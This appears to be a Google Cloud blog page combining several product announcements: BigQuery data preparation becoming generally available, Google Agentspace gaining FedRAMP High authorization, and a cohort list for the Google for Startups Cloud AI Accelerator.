Build AI-powered solutions with Google Cloud
Traditional wildfire response methods are proving insufficient against escalating wildfire severity. With WindTL and Vertex AI, Improving Aviation is innovating in disaster management through advanced AI applications. Supported by Google Cloud’s infrastructure and AI tools, Improving Aviation is building WindTL to be a scalable and resilient system to address the complex data processing and prediction challenges associated with extreme wildfires.
According to Gartner®, “Gartner clients now report that 90% or more of their time is spent preparing data (as high as 94% in complex industries) for advanced analytics, data science and data engineering.”1. Last year, we introduced BigQuery data preparation, which helps data analyst teams wrangle data with help from Gemini in BigQuery. With it, the tedious task of data preparation becomes a breeze as Gemini analyzes your data and schema, and offers context-aware suggestions for cleaning, transforming, and enriching your data.
BigQuery’s approach to data preparation can also help you automate building data pipelines, allowing users with varying technical backgrounds to efficiently prepare data for analysis, regardless of their proficiency with SQL. Once data has been prepared, you can then run your data integration workloads on BigQuery’s serverless, cloud-native, AI-ready data analytics platform.
Today, we’re taking things one step further and announcing that BigQuery data preparation is generally available. It now also integrates with BigQuery pipelines, letting you connect data ingestion and transformation tasks so you can create end-to-end data pipelines with incremental processing, all in a unified environment. You can view all the transformations that BigQuery data preparation generates as SQL code and use BigQuery repositories and Git to collaborate on and manage your code.
A BigQuery data preparation refresher
BigQuery data preparation leverages Gemini to provide you with intelligent guidance throughout the data preparation process. This includes:
Comprehensive transformation capabilities: Because data preparation runs on BigQuery, it supports a wide array of data transformation functions, including typecasting, string manipulation, datetime math, and JSON extraction.
Data standardization: Gemini in BigQuery analyzes your data and schema to provide intelligent suggestions for cleaning and transforming data. For example, it can identify valid date formats and standardize your data accordingly.
Automated schema mapping: Built-in schema handling helps you manage schema drift and helps prevent production pipelines from failing.
AI-suggested join keys for data enrichment: BigQuery data preparation analyzes your data and suggests relevant join keys for data enrichment.
In addition, users benefit from visual, low-code data pipeline features:
Visual data pipelines: Design, execute, and monitor complex data pipelines with a user-friendly, low-code visual interface. Cost-efficient processing on BigQuery’s fully managed and completely serverless platform scales to any use case. For more efficient changed data propagation, you can also configure your preparations to process data incrementally.
Data quality enforcement with error tables: Define validation rules and automatically route invalid rows to a designated error table, helping to ensure data quality and integrity.
Streamlined deployment with GitHub integration: You can view data preparations in pipe query syntax and export them to a Git repository for version control.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud data analytics’), (‘body’, <wagtail.rich_text.RichText object at 0x3e5c47ed9850>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/bigquery/’), (‘image’, None)])]>
Tasks, assemble! with BigQuery pipelines
You can now visually connect a series of data processing tasks, including data preparation tasks, in a defined sequence with BigQuery pipelines. The data preparation integration with BigQuery pipelines makes it easy to add it as part of an automation and orchestration flow, enabling end-to-end data pipelines that encompass data ingestion, preparation, transformation, and loading.
Wrangle your CLs with BigQuery repositories
Data preparation now generates SQL code in pipe query syntax, which simplifies complex queries and improves readability. This enables data engineers to easily review data preparation code, include it in larger pipelines, and integrate data preparations in CI/CD process for better collaboration, version control, and automated deployment. This transparency helps you bridge the gap between visual transformations and code, thus bridging across teams and preferences.
BigQuery data preparation integrates with BigQuery repositories and Git, providing robust version control and collaboration features for your data preparation assets. You can treat your data preparations as code artifacts and check them into repositories, enabling you to track changes, collaborate with team members, and revert to previous versions if needed. This integration streamlines the development process, promotes code reusability, and ensures that your data preparation logic is well-managed and auditable.
What customers are saying
GAF is a major manufacturer of roofing materials in North America, and is adopting data preparation for creating data transformation pipelines on BigQuery.
“GAF is looking to modernize the ETL infrastructure and adopt a BigQuery native, low-code solution. BigQuery data preparation will help our skilled business users and the analytics team in the data preparation processes for the enablement of self-service analytics.” – Puja Panchagnula, Management Director – Enterprise Data Management & Analytics, GAF
mCloud Technologies helps businesses in sectors like energy, buildings, and manufacturing to optimize the performance, reliability, and sustainability of their assets.
“We receive file data feeds from our partners. BigQuery data preparation allows our product managers to prepare and operate the data with little to no help from our data engineering team.” – Jim Christian, Chief Product and Technology Officer, mCloud Technologies
Public Value Technologies is a joint venture between two German public broadcasting organizations (ARD).
“Public Value Technologies receives data feeds from our media partners for our data mesh solution and AI applications. BigQuery data preparation allows our data analysts and scientists to rapidly integrate the data feeds that standardize and preprocess the data in a low code way.” – Korbinian Schwinger, Team Lead Data Engineer, Public Value Technologies
Get started
With its powerful AI capabilities, intuitive interface, and tight integration with BigQuery data pipelines, BigQuery data preparation is set to revolutionize the way organizations manage and prepare their data. By automating tedious tasks, improving data quality, and empowering users, this innovative solution reduces the time you spend preparing data and improves your productivity.
Explore the following resources to get started with BigQuery data preparation:
1. Gartner, State of Metadata Management: Aggressively Pursue Metadata to Enable AI and Generative AI, By Mark Beyer, Guido De Simoni, 4. September 2024. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.
We’re excited to announce that Google Agentspace is now authorized for FedRAMP High, bringing Google’s powerful search technology and agentic capabilities to the enterprise. Agentspace is available within Google Cloud’s Assured Workloads, expanding our AI portfolio for public sector organizations and offered on a per-user basis. This announcement builds upon our recent update, which introduced Google’s advanced Gemini models, Vertex AI Search, and features like private data grounding achieving FedRAMP High.
Google Agentspace leverages Vertex AI Search and our multi-modal Gemini models to provide a robust enterprise search and AI assistant. Research shows that 89% of employees search up to six different sources to complete their work1. Agentspace addresses this problem and the challenge of data and documents scattered across hard-to-access systems which leads to siloed search experiences. While individual systems can be searched, accessing information across the entire enterprise can be difficult. Data privacy is crucial to prevent data leakage and content owners must maintain access control settings to ensure compliance and security. Employees must be empowered by unlocking enterprise knowledge and boosting productivity. Imagine the time saved by making information easily discoverable across the organization using Agentspace.
Agentspace can unlock enterprise expertise for employees with agents that combine Gemini’s advanced reasoning with your enterprise data, which remains in your control and is not used by Google to train its models without your permission. Agentspace is the first FedRAMP High agentic system that is grounded in your enterprise knowledge. This enables employees to interact and engage with your enterprise data in new ways. It helps them find what they need at the right time and answer questions confidently.
In today’s information-overload environment, leaders need concise summaries and easy-to-understand formats to make timely decisions. Agentspace provides these by condensing and summarizing organizational knowledge. Its multi-modal capabilities also enable image generation, such as flowcharts to simplify complex concepts. Imagine asking, “What are the average IT expenditures by month for the last three fiscal years?” and then the answer appears as a visual graph. “How can I analyze trends in logistics data stored in my enterprise Google BigQuery?” and the answer generates a one page summary. Furthermore, you could ask Agentspace to draft an email to your team to discuss the findings. Agentspace in Assured Workloads unlocks these capabilities.
With this launch, we’re delivering an initial set of capabilities that empower government agencies to leverage agents for accessing enterprise expertise. This brings the best of Google Search and Gemini to the public sector. More Agentspace features, including new connectors, actions, and built in agents, are planned for the FedRAMP roadmap, further enhancing the power of agentic AI for government customers. Here’s a preview:
Connectors: Agentspace agents can gather data from first-party, cloud-native systems using Agentspace connectors. These integrate your enterprise data with both first-party services and external data sources. Google provides numerous pre-built connectors for Google Drive, SharePoint, Slack, Box, DocuSign, and many other third-party applications. Agentspace connectors respect the access control policies of each application and your enterprise identity provider.
Actions: Agents can automate workflows through Actions, which can perform tasks on your behalf. Actions allow you to leverage insights from your enterprise data and interact with external applications and systems via built-in automations. For example, Actions can send emails through Gmail and Outlook, schedule meetings using Google Calendar and Outlook, and manage workflows in Workday and Jira Cloud.
These capabilities are unified by the Gemini 2.0 multi-modal AI assistant. Gemini provides reasoning over all your enterprise and externally sourced data and is available at FedRAMP High in Assure Workloads today. It allows all of Agentspace’s agents to be used by simply chatting with your documents, website, and third-party data and systems.
To learn more about how Google Agentspace and other AI solutions can empower your enterprise by unlocking your data and enterprise expertise, join us at Google Cloud Next 2025 in Las Vegas.
Startups focused on AI are influencing so many areas of our lives. They’re defining the future of education, advancing healthcare innovation, reinventing collaboration and more.
To help AI-focused startups scale quickly and build responsibly, we’re hosting the Google for Startups Cloud AI Accelerator. This program builds on the success of our recent AI First accelerators and targets startups building AI solutions based in the U.S. and Canada. This is the first of several AI-focused programs we’ll offer throughout the year across the US, Canada, Europe, India and Brazil.
After a rigorous selection process, we’ve selected a cohort of dynamic companies leveraging AI to address a wide range of real-world challenges. Meet the startups:
Alma (Palo Alto, CA): Simplifies US immigration for global talent.
Asepha (Toronto, ON): Develops fully autonomous AI pharmacists.
CAMB.AI (Wilmington, DE): Enables multilingual storytelling with AI.
Creati AI (San Jose, CA): Generates usable AI videos using just elements.
Finnt (Miami, FL): Automates solutions for corporate finance teams.
HydroX AI (San Jose, CA): Automates generative AI risk and compliance.
Instalily (New York, NY): Automates B2B workflows using AI agents.
Instreamatic (Boca Raton, FL): Creates personalized video/audio ad variations.
Kahuna Labs (San Jose, CA): Provides comprehensive technical product support.
Lately (Stone Ridge, NY): Manages social media with AI, boosting ROI.
Multimodal (New York, NY): Automates financial services workflows with Agentic AI.
Simular (Palo Alto, CA): Creates personal AI assistants for computers.
Starcloud (Redmond, WA): Provides data centers in space.
Vody (New York, NY): Builds AI models for enhanced retail engagement.
The equity-free program kicks off at Cloud Next 2025 where the cohort will pitch their company on stage in preparation for a high profile Demo Day in June for potential partners, customers and investors. Startups will then receive 10 weeks of hands-on mentorship and technical support focused on using AI in their core service or product.
These startups will collaborate with a cohort of peer founders and engage with leaders across Google. The curriculum will give founders access to the latest Google AI tools, including Vertex AI, Gemini and Agentspace, and will also include workshops on infrastructure, user experience (UX), growth, sales, leadership and more.
After graduation, startups join the active Google for Startups Accelerator community, where they receive ongoing support, and have the opportunity to build lasting connections with like-minded founders, mentors and investors.
We are honored to partner with this cohort of companies through this Accelerator and beyond. Register your interest to get updates on the program, and join us in celebrating!